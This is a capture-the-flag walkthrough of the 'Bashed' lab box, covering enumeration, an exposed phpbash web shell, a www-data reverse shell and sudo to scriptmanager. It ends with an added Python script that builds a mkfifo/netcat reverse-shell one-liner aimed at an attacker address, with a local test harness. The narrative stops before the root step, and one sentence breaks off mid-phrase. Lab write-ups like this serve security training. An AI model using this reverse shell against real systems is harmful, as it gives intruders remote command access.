The last box I didn't get root access on the first time I tried is Bashed, an Ubuntu Linux web server being used for what appears to be a personal blog. The blog is about a web shell that was developed by the author of the blog and seems to be in use on the server itself, possibly for testing, as it sits in the /dev directory. Once we use this to get access to the machine, we find a /scripts directory whose contents seem to be run as root every so often, and creating a file there leads to the eventual privilege escalation. I liked this one and can see why I had issues with it last time, as I ended up needing to bounce between multiple accounts and shells to eventually get root.

Below is a rough outline of the path I took.

Web shell > User shell (www-data) > User shell (scriptmanager) > root shell

As usual, I started with an nmap scan of the IP. It showed only one port open, HTTP on port 80.

Looking into the website itself, it appears to be a blog for someone tracking the development of a web shell project, even including a link to a GitHub page.

[Image: Blog home page]
[Image: Blog entry about the 'phpbash' project, a web shell on GitHub]

Looking around the blog and GitHub page suggested the owner of the blog developed a web shell and had tested it on the same server the blog is hosted on. I ran gobuster to enumerate other directories and found a few promising ones, most notably the /dev directory.

When investigating /dev I found the same two files as were listed on the GitHub page, one of them phpbash.php. This looks to be where the user was testing their project. If that's the case, 'phpbash.php' should be a fully functional web shell for this server.

[Image: Functional web shell found in /dev directory]

It looks like phpbash.php is the web shell we were looking for and allows us to run commands on the server directly from the browser as the www-data user. This opens up some possibilities, but the first thing we need is an actual reverse shell to the machine for ease of access.

The normal method of using netcat to connect to a listener on my machine and using the -e flag to execute bash did not work, so I had to find another way. I found an article from SANS on this exact subject that provided steps on how to create a named pipe for use with netcat that essentially functions the same way as '-e /bin/bash' without actually using that flag.

[Image: Creating reverse shell without netcat -e functionality]

When combining the two commands above with a netcat listener on my machine, I got a reverse shell as the www-data user.

[Image: Catching reverse shell from www-data user]

Ok, so now we have a shell on the machine, but only as

[Image: Sudo permissions for www-data user]

Interestingly, this shows us we can sudo anything with no password needed, as long as we run the command as the scriptmanager user.

I transferred the LinEnum script over to the machine through netcat and ran it, but it didn't give much useful information. However, I did find a folder in the root directory called "scripts" that was owned by the scriptmanager user.

[Image: Root directory showing folder owned by scriptmanager user]

Using our sudo permissions to run commands as the scriptmanager user, I checked the contents of this folder. It had one Python script that appeared to be writing to a text file in the same folder.

[Image: Contents of /scripts directory]
[Image: Scriptmanager script to write to test.txt]
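The named-pipe reverse shell used above to get around a netcat without -e, as an added example that is not code from the original write-up or from the SANS article it cites. `build_fifo_revshell()` produces the standard mkfifo one-liner; because the one-liner needs a listener and a working `nc` to do anything, the same file can also run in a "relay" mode that stands in for `nc` (stdin to socket, socket to stdout), so `demo()` can exercise the whole loop against a throwaway listener on 127.0.0.1 without any network. The attacker address 10.10.14.1:4444 printed by `main` is an assumed placeholder, not an address from the page.

```python
"""Named-pipe reverse shell for a netcat that lacks -e (editor's added example).

Not code from the original write-up or the SANS article it cites. The one-liner
is the well-known mkfifo trick; so the pipeline can be exercised offline, this
file can also run as a minimal stand-in for nc ("relay" mode) that connects to
a listener and copies stdin to the socket and the socket to stdout.
The attacker address 10.10.14.1:4444 in main is an assumed placeholder.
"""
import os
import shlex
import socket
import subprocess
import sys
import tempfile
import threading


def build_fifo_revshell(lhost, lport, fifo="/tmp/f", nc="nc"):
    """Return the mkfifo reverse-shell one-liner.

    cat feeds whatever the attacker writes into the FIFO to an interactive
    shell; the shell's stdout and stderr go to nc, which ships them to the
    listener; nc's own stdout (the attacker's keystrokes) is redirected back
    into the FIFO. The loop gives nc -e behaviour without the -e flag.
    """
    return (f"rm -f {fifo}; mkfifo {fifo}; "
            f"cat {fifo} | /bin/sh -i 2>&1 | {nc} {lhost} {lport} > {fifo}")


def relay(host, port):
    """Tiny nc stand-in: stdin -> socket and socket -> stdout, then exit."""
    sock = socket.create_connection((host, int(port)))

    def stdin_to_socket():
        while True:
            chunk = os.read(0, 4096)
            if not chunk:          # shell exited: tell the listener we are done
                break
            sock.sendall(chunk)
        sock.shutdown(socket.SHUT_WR)

    threading.Thread(target=stdin_to_socket, daemon=True).start()
    while True:
        data = sock.recv(4096)
        if not data:               # listener hung up
            break
        os.write(1, data)
    os._exit(0)                    # closes fd 1, so cat reading the FIFO sees EOF


def demo(commands="echo hello_from_fifo\nexit\n", timeout=20):
    """Run the one-liner against a throwaway local listener; return its output.

    The commands string is constructed input standing in for what the
    attacker would type at the netcat listener.
    """
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    srv.settimeout(timeout)
    port = srv.getsockname()[1]
    # This file in "relay" mode replaces nc on the "victim" side.
    nc = f"{shlex.quote(sys.executable)} {shlex.quote(os.path.abspath(__file__))} relay"
    with tempfile.TemporaryDirectory() as tmp:
        fifo = os.path.join(tmp, "f")
        proc = subprocess.Popen(build_fifo_revshell("127.0.0.1", port, fifo, nc), shell=True)
        conn, _ = srv.accept()
        conn.settimeout(timeout)
        conn.sendall(commands.encode())
        out = b""
        while True:                # read until the relay signals the shell is gone
            data = conn.recv(4096)
            if not data:
                break
            out += data
        conn.close()
        proc.wait(timeout=timeout)
    srv.close()
    return out.decode(errors="replace")


if __name__ == "__main__":
    if len(sys.argv) == 4 and sys.argv[1] == "relay":
        relay(sys.argv[2], sys.argv[3])
    else:
        print(build_fifo_revshell("10.10.14.1", 4444))   # assumed attacker host/port
        print(demo())
```

On the real box you would paste only the string from `build_fifo_revshell()` into the web shell, with the target's own `nc` and your listener's address; the relay mode exists purely so the loop can be run and checked locally. The order of the pipeline matters: the shell must be in the middle so that both its stdout and stderr (`2>&1`) reach the listener, and the trailing `> fifo` is what turns the one-way pipeline into a loop.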